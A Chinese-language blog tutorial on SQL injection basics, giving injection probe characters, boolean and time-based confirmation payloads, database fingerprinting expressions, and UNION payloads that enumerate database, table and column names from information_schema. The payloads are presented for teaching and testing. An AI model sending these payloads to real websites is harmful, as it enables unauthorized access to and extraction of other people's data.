<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="SQL Injection什么是SQL注入？SQL 注入是一种网络安全漏洞，允许攻击者干扰应用程序对其数据库的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据，或应用程序本身能够访问的任何其他数据。在许多情况下，攻击者可以修改或删除此数据，从而导致对应用程序的内容或行为的持续更改。在某些情况下，攻击者可以升级 SQL 注入攻击以危害底层服务器或其他后端基础设施，或执行">
<meta property="og:type" content="article">
<meta property="og:title" content="SQLi 基础知识">
<meta property="og:url" content="http://example.com/2022/03/19/SQLi-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/index.html">
<meta property="og:site_name" content="sing&#39;s Blog">
<meta property="og:description" content="SQL Injection什么是SQL注入？SQL 注入是一种网络安全漏洞，允许攻击者干扰应用程序对其数据库的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据，或应用程序本身能够访问的任何其他数据。在许多情况下，攻击者可以修改或删除此数据，从而导致对应用程序的内容或行为的持续更改。在某些情况下，攻击者可以升级 SQL 注入攻击以危害底层服务器或其他后端基础设施，或执行">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-03-19T07:15:06.000Z">
<meta property="article:modified_time" content="2022-03-19T11:10:24.826Z">
<meta property="article:author" content="sing">
<meta property="article:tag" content="SQLi">
<meta property="article:tag" content="注入">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/03/19/SQLi-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>SQLi 基础知识 | sing's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">sing's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-首页">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-关于">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-标签">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-分类">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-归档">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/03/19/SQLi-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="sing">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sing's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQLi 基础知识
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2022-03-19 15:15:06 / Modified: 19:10:24" itemprop="dateCreated datePublished" datetime="2022-03-19T15:15:06+08:00">2022-03-19</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SQLi/" itemprop="url" rel="index"><span itemprop="name">SQLi</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h1><h2 id="什么是SQL注入？"><a href="#什么是SQL注入？" class="headerlink" title="什么是SQL注入？"></a>什么是SQL注入？</h2><p>SQL 注入是一种网络安全漏洞，允许攻击者<strong>干扰</strong>应用程序对其<strong>数据库</strong>的<strong>查询</strong>。它通常允许攻击者<strong>查看他们通常无法检索的数据</strong>。这可能包括属于<strong>其他用户</strong>的数据，或<strong>应用程序</strong>本身能够<strong>访问</strong>的任何其他数据。在许多情况下，攻击者可以<strong>修改</strong>或<strong>删除</strong>此数据，从而导致对应用程序的内容或行为的持续更改。<br>在某些情况下，攻击者可以升级 SQL 注入攻击以<strong>危害底层服务器</strong>或其他后端基础设施，或执行拒绝服务攻击。 （来自<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/sql-injection">这里</a>）。 </p>
<blockquote>
<p>在这篇文章中，我将假设我们发现了一个可能的 SQL 注入，我们将讨论确认 SQL 注入、数据库识别和执行操作的可能方法。</p>
</blockquote>
<h2 id="入口点检测"><a href="#入口点检测" class="headerlink" title="入口点检测"></a>入口点检测</h2><p>您可能已经发现了一个存在 <code>SQLi</code> 的站点，因为服务器在接收含有 <code>SQL</code> 相关语句的输入时表现异常。因此，您需要做的第一件事是如何在不破坏 <code>SQL</code> 语法的前提下注入数据。 </p>
<p>测试 PayLoad：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> [Nothing]</span><br><span class="line"><span class="string">&#x27;</span></span><br><span class="line"><span class="string">&quot;</span></span><br><span class="line"><span class="string">`</span></span><br><span class="line"><span class="string">&#x27;</span>)</span><br><span class="line"><span class="string">&quot;)</span></span><br><span class="line"><span class="string">`)</span></span><br><span class="line"><span class="string">&#x27;))</span></span><br><span class="line"><span class="string">&quot;</span>))`</span><br><span class="line">`))</span><br></pre></td></tr></table></figure>

<p>然后，您需要知道如何<strong>修复查询，以免出现错误</strong>。为了修复查询，您可以 <strong>input</strong> 数据，以便闭合 <strong>previous query</strong>，或者您可以只 <strong>input</strong> 您的数据并<strong>在数据后面添加注释符</strong>。</p>
<p><em>请注意，如果您可以看到错误消息，或者您可以在查询正常工作和不正常工作时发现差异，这个阶段会更容易。</em></p>
<h3 id="注释符"><a href="#注释符" class="headerlink" title="注释符"></a><strong>注释符</strong></h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">MySQL</span><br><span class="line">#comment</span><br><span class="line"><span class="comment">-- comment     [Note the space after the double dash]</span></span><br><span class="line"><span class="comment">/*comment*/</span></span><br><span class="line"><span class="comment">/*! MYSQL Special SQL */</span></span><br><span class="line"><span class="comment">/*!50726 select version()*/</span> 向低版本兼容执行。<span class="comment">/*!xxxxxx select version()*/</span> <span class="operator">&lt;=</span> <span class="number">5.7</span><span class="number">.26</span> ，执行<span class="keyword">SQL</span>语句 ，<span class="operator">&gt;</span> <span class="number">5.7</span><span class="number">.26</span> 作为注释符使用。</span><br><span class="line"></span><br><span class="line">PostgreSQL</span><br><span class="line"><span class="comment">--comment</span></span><br><span class="line"><span class="comment">/*comment*/</span></span><br><span class="line"></span><br><span class="line">MSQL</span><br><span class="line"><span class="comment">--comment</span></span><br><span class="line"><span class="comment">/*comment*/</span></span><br><span class="line"></span><br><span class="line">Oracle</span><br><span class="line"><span class="comment">--comment</span></span><br><span class="line"></span><br><span class="line">SQLite</span><br><span class="line"><span class="comment">--comment</span></span><br><span class="line"><span class="comment">/*comment*/</span></span><br><span class="line"></span><br><span class="line">HQL</span><br><span class="line">HQL does <span class="keyword">not</span> support comments</span><br></pre></td></tr></table></figure>
<h3 id="空白字符"><a href="#空白字符" class="headerlink" title="空白字符"></a>空白字符</h3><p>MySQL</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">%</span><span class="number">09</span></span><br><span class="line"><span class="operator">%</span><span class="number">0</span>A</span><br><span class="line"><span class="operator">%</span><span class="number">0</span>B</span><br><span class="line"><span class="operator">%</span><span class="number">0</span>C</span><br><span class="line"><span class="operator">%</span><span class="number">0</span>D</span><br><span class="line"><span class="operator">%</span><span class="number">20</span></span><br></pre></td></tr></table></figure>

<p>Oracle</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="operator">%</span><span class="number">00</span></span><br><span class="line"><span class="operator">%</span><span class="number">09</span></span><br><span class="line"><span class="operator">%</span><span class="number">0</span>A</span><br><span class="line"><span class="operator">%</span><span class="number">0</span>B</span><br><span class="line"><span class="operator">%</span><span class="number">0</span>C</span><br><span class="line"><span class="operator">%</span><span class="number">0</span>D</span><br><span class="line"><span class="operator">%</span><span class="number">20</span></span><br></pre></td></tr></table></figure>

<p>MSSQL</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%00-%20</span><br></pre></td></tr></table></figure>

<h3 id="基于逻辑运算确认-SQLi"><a href="#基于逻辑运算确认-SQLi" class="headerlink" title="基于逻辑运算确认 SQLi"></a>基于逻辑运算确认 SQLi</h3><p>确认 SQLi 的方式之一是通过逻辑运算，并通过该运算获得预期结果。如 <code>?username=Peter</code> 和 <code>?username=Peter&#39; or &#39;1&#39;=&#39;1</code> ，通过在参数后面添加 SQL 逻辑运算表达式，当两个请求的响应内容一致时，即很可能说明你已经找到一个 SQLi 漏洞。</p>
<p>或者通过数学运算的概念也可以， 如 <code>?id=1</code> 和 <code>?id=2-1</code>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">page.asp?id=1 or 1=1 -- true</span><br><span class="line">page.asp?id=1&#x27; or 1=1 -- true</span><br><span class="line">page.asp?id=1&quot; or 1=1 -- true</span><br><span class="line">page.asp?id=1 and 1=2 -- false</span><br></pre></td></tr></table></figure>

<blockquote>
<p>基于逻辑运算的 SQLi 测试列表<br><a target="_blank" rel="noopener" href="https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-M7d-n6kjX238xqV3-OB%2F-M7dsI5mMfPYjSqdzvtB%2Fsqli-logic.txt?alt=media&amp;token=6843509d-e5dd-4452-81d8-7a9b02de6a93">https://1517081779-files.gitbook.io/~/files/v0/b/gitbook-28427.appspot.com/o/assets%2F-L_2uGJGU7AVNRcqRvEi%2F-M7d-n6kjX238xqV3-OB%2F-M7dsI5mMfPYjSqdzvtB%2Fsqli-logic.txt?alt=media&amp;token=6843509d-e5dd-4452-81d8-7a9b02de6a93</a></p>
</blockquote>
<h3 id="基于响应时间确认-SQLi"><a href="#基于响应时间确认-SQLi" class="headerlink" title="基于响应时间确认 SQLi"></a>基于响应时间确认 SQLi</h3><p>某些情况，使用基于逻辑运算的方式可能得不到预期的结果，因为某些原因导致响应结果并没有变化。所以需要基于响应时间的方式去确认 SQLi。我们可以通过执行诸如 <code>sleep()</code>等函数，或者执行复杂的数据处理请求。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">MySQL (string concat and logical ops) # 字符串连接及逻辑运算</span><br><span class="line">1&#x27; + sleep(10)</span><br><span class="line">1&#x27; and sleep(10)</span><br><span class="line">1&#x27; &amp;&amp; sleep(10)</span><br><span class="line">1&#x27; | sleep(10)</span><br><span class="line"></span><br><span class="line">PostgreSQL (only support string concat)</span><br><span class="line">1&#x27; || pg_sleep(10)</span><br><span class="line"></span><br><span class="line">MSQL</span><br><span class="line">1&#x27; WAITFOR DELAY &#x27;0:0:10&#x27;</span><br><span class="line"></span><br><span class="line">Oracle</span><br><span class="line">1&#x27; AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE(&#x27;[RANDSTR]&#x27;,[SLEEPTIME])</span><br><span class="line">1&#x27; AND 123=DBMS_PIPE.RECEIVE_MESSAGE(&#x27;ASD&#x27;,10)</span><br><span class="line"></span><br><span class="line">SQLite</span><br><span class="line">1&#x27; AND [RANDNUM]=LIKE(&#x27;ABCDEFG&#x27;,UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</span><br><span class="line">1&#x27; AND 123=LIKE(&#x27;ABCDEFG&#x27;,UPPER(HEX(RANDOMBLOB(1000000000/2))))</span><br></pre></td></tr></table></figure>

<h3 id="确认数据库类型"><a href="#确认数据库类型" class="headerlink" title="确认数据库类型"></a>确认数据库类型</h3><p>确认数据库类型的方式之一是使用各数据库专有的，区别与其他数据库的函数，详见下表：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">[<span class="string">&quot;conv(&#x27;a&#x27;,16,2)=conv(&#x27;a&#x27;,16,2)&quot;</span>                   ,<span class="string">&quot;MYSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;connection_id()=connection_id()&quot;</span>                 ,<span class="string">&quot;MYSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;crc32(&#x27;MySQL&#x27;)=crc32(&#x27;MySQL&#x27;)&quot;</span>                   ,<span class="string">&quot;MYSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)&quot;</span>       ,<span class="string">&quot;MSSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;@@CONNECTIONS&gt;0&quot;</span>                                 ,<span class="string">&quot;MSSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;@@CONNECTIONS=@@CONNECTIONS&quot;</span>                     ,<span class="string">&quot;MSSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;@@CPU_BUSY=@@CPU_BUSY&quot;</span>                           ,<span class="string">&quot;MSSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;USER_ID(1)=USER_ID(1)&quot;</span>                           ,<span class="string">&quot;MSSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;ROWNUM=ROWNUM&quot;</span>                                   ,<span class="string">&quot;ORACLE&quot;</span>],</span><br><span class="line">[<span class="string">&quot;RAWTOHEX(&#x27;AB&#x27;)=RAWTOHEX(&#x27;AB&#x27;)&quot;</span>                   ,<span class="string">&quot;ORACLE&quot;</span>],</span><br><span class="line">[<span class="string">&quot;LNNVL(0=123)&quot;</span>                                    ,<span class="string">&quot;ORACLE&quot;</span>],</span><br><span class="line">[<span class="string">&quot;5::int=5&quot;</span>                                        ,<span class="string">&quot;POSTGRESQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;5::integer=5&quot;</span>                                    ,<span class="string">&quot;POSTGRESQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;pg_client_encoding()=pg_client_encoding()&quot;</span>       ,<span class="string">&quot;POSTGRESQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;get_current_ts_config()=get_current_ts_config()&quot;</span> ,<span class="string">&quot;POSTGRESQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;quote_literal(42.5)=quote_literal(42.5)&quot;</span>         ,<span class="string">&quot;POSTGRESQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;current_database()=current_database()&quot;</span>           ,<span class="string">&quot;POSTGRESQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;sqlite_version()=sqlite_version()&quot;</span>               ,<span class="string">&quot;SQLITE&quot;</span>],</span><br><span class="line">[<span class="string">&quot;last_insert_rowid()&gt;1&quot;</span>                           ,<span class="string">&quot;SQLITE&quot;</span>],</span><br><span class="line">[<span class="string">&quot;last_insert_rowid()=last_insert_rowid()&quot;</span>         ,<span class="string">&quot;SQLITE&quot;</span>],</span><br><span class="line">[<span class="string">&quot;val(cvar(1))=1&quot;</span>                                  ,<span class="string">&quot;MSACCESS&quot;</span>],</span><br><span class="line">[<span class="string">&quot;IIF(ATN(2)&gt;0,1,0) BETWEEN 2 AND 0&quot;</span>               ,<span class="string">&quot;MSACCESS&quot;</span>],</span><br><span class="line">[<span class="string">&quot;cdbl(1)=cdbl(1)&quot;</span>                                 ,<span class="string">&quot;MSACCESS&quot;</span>],</span><br><span class="line">[<span class="string">&quot;1337=1337&quot;</span>,   <span class="string">&quot;MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL&quot;</span>],</span><br><span class="line">[<span class="string">&quot;&#x27;i&#x27;=&#x27;i&#x27;&quot;</span>,     <span class="string">&quot;MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL&quot;</span>],</span><br></pre></td></tr></table></figure>

<p>此外，如果应用程序能够回显查询的数据，可以直接使用如： <code>uniont select version()</code> 等方式直接查询数据库类型及版本。</p>
<p><strong>如冇特别说明，以下例子使用均默认使用 MySQL 作为示例：</strong></p>
<h2 id="基于-union-的注入"><a href="#基于-union-的注入" class="headerlink" title="基于 union 的注入"></a>基于 union 的注入</h2><h3 id="检测字段数"><a href="#检测字段数" class="headerlink" title="检测字段数"></a>检测字段数</h3><p>如果可以回显查询的数据， 基于 union 的注入是 SQLi 五种基本注入类型中最优的攻击方式。数据查询语句语法规定，union 查询时，主查询与子查询必须必须要有相同的字段数才能正确执行。所以，为了执行 union 注入，首先需要确定原始SQL查询语句中涉及到多少的字段数。 </p>
<p>通常使用如下两种方式去确认原始查询语句涉及的字段数。</p>
<h4 id="Order-x2F-Group-by"><a href="#Order-x2F-Group-by" class="headerlink" title="Order&#x2F;Group by"></a>Order&#x2F;Group by</h4><p>递增 <code>Order/Group by</code> 后面的数值，直至应用程序响应不同的页面内容。即使 <code>GROUP BY</code> 和 <code>ORDER BY</code> 在 SQL 中功能并不一样，但是两者都可以用作确认字段数。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27; ORDER BY 1--+    #True</span></span><br><span class="line"><span class="string">1&#x27;</span> <span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="number">2</span><span class="comment">--+    #True</span></span><br><span class="line"><span class="number">1</span><span class="string">&#x27; ORDER BY 3--+    #True</span></span><br><span class="line"><span class="string">1&#x27;</span> <span class="keyword">ORDER</span> <span class="keyword">BY</span> <span class="number">4</span><span class="comment">--+    #False - Query is only using 3 columns</span></span><br><span class="line">                        #<span class="number">-1</span><span class="string">&#x27; UNION SELECT 1,2,3--+    True</span></span><br></pre></td></tr></table></figure>

<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27; GROUP BY 1--+    #True</span></span><br><span class="line"><span class="string">1&#x27;</span> <span class="keyword">GROUP</span> <span class="keyword">BY</span> <span class="number">2</span><span class="comment">--+    #True</span></span><br><span class="line"><span class="number">1</span><span class="string">&#x27; GROUP BY 3--+    #True</span></span><br><span class="line"><span class="string">1&#x27;</span> <span class="keyword">GROUP</span> <span class="keyword">BY</span> <span class="number">4</span><span class="comment">--+    #False - Query is only using 3 columns</span></span><br><span class="line">                        #<span class="number">-1</span><span class="string">&#x27; UNION SELECT 1,2,3--+    True</span></span><br></pre></td></tr></table></figure>

<h4 id="UNION-SELECT"><a href="#UNION-SELECT" class="headerlink" title="UNION SELECT"></a>UNION SELECT</h4><p>增加 <code>null</code> 值，直接应用程序返回正确的响应。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span><span class="string">&#x27; UNION SELECT null-- - Not working</span></span><br><span class="line"><span class="string">1&#x27;</span> <span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="keyword">null</span>,<span class="keyword">null</span><span class="comment">-- - Not working</span></span><br><span class="line"><span class="number">1</span><span class="string">&#x27; UNION SELECT null,null,null-- - Worked</span></span><br></pre></td></tr></table></figure>

<p><em>您应该使用 <code>null</code> 值，因为在某些情况下，查询双方的字段类型必须相同，而 <code>null</code> 在每种情况下都有效。</em></p>
<h3 id="提取数据库名-表名-和-字段名"><a href="#提取数据库名-表名-和-字段名" class="headerlink" title="提取数据库名,表名 和 字段名"></a>提取数据库名,表名 和 字段名</h3><p>在接下来的示例中，我们将获取所有数据库的名称、数据库的表名、表的字段名：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#Database names</span><br><span class="line"><span class="number">-1</span><span class="string">&#x27; UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">#Tables of a database</span></span><br><span class="line"><span class="string">-1&#x27;</span> <span class="keyword">UniOn</span> <span class="keyword">Select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,gRoUp_cOncaT(<span class="number">0x7c</span>,table_name,<span class="number">0x7C</span>) <span class="keyword">fRoM</span> information_schema.tables <span class="keyword">wHeRe</span> table_schema<span class="operator">=</span>[database]</span><br><span class="line"></span><br><span class="line">#<span class="keyword">Column</span> names</span><br><span class="line"><span class="number">-1</span><span class="string">&#x27; UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]</span></span><br></pre></td></tr></table></figure>

<p><em>在每个不同的数据库中发现这些数据的方法不同，但方法始终相同。</em></p>
<h2 id="基于隐藏的-union-注入"><a href="#基于隐藏的-union-注入" class="headerlink" title="基于隐藏的 union 注入"></a>基于隐藏的 union 注入</h2><p>如果您可以看见查询的输出但无法进行 union 的注入，则您可能正在面对基于隐藏 union 的注入。<br>通常在这种情况下，我们最终只能进行盲注攻击。要将盲注转换为基于 union 的注入，您需要获取当前查询语句的原型。我们可以通过使用盲注的方式获取，每个数据库均有默认的表存储着当前执行 SQL 语句。<br>提取 SQL 查询语句原型后，我们需要相应地调整Payload，安全地闭合原始查询，然后进行 union 注入。</p>
<p><strong>在 MySQL 中获取当前正在执行的 SQL 语句</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mysql <span class="operator">&gt;</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> information_schema.`PROCESSLIST` <span class="keyword">where</span> info <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">null</span>;</span><br><span class="line"><span class="operator">+</span><span class="comment">----+------+-----------------+------+---------+------+-----------+-----------------------------------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> ID <span class="operator">|</span> <span class="keyword">USER</span> <span class="operator">|</span> HOST            <span class="operator">|</span> DB   <span class="operator">|</span> COMMAND <span class="operator">|</span> <span class="type">TIME</span> <span class="operator">|</span> STATE     <span class="operator">|</span> INFO                                                                  <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">----+------+-----------------+------+---------+------+-----------+-----------------------------------------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">87</span> <span class="operator">|</span> root <span class="operator">|</span> localhost:<span class="number">56330</span> <span class="operator">|</span> test <span class="operator">|</span> Query   <span class="operator">|</span>    <span class="number">0</span> <span class="operator">|</span> executing <span class="operator">|</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> information_schema.`PROCESSLIST` <span class="keyword">where</span> info <span class="keyword">is</span> <span class="keyword">not</span> <span class="keyword">null</span> <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">----+------+-----------------+------+---------+------+-----------+-----------------------------------------------------------------------+</span></span><br></pre></td></tr></table></figure>

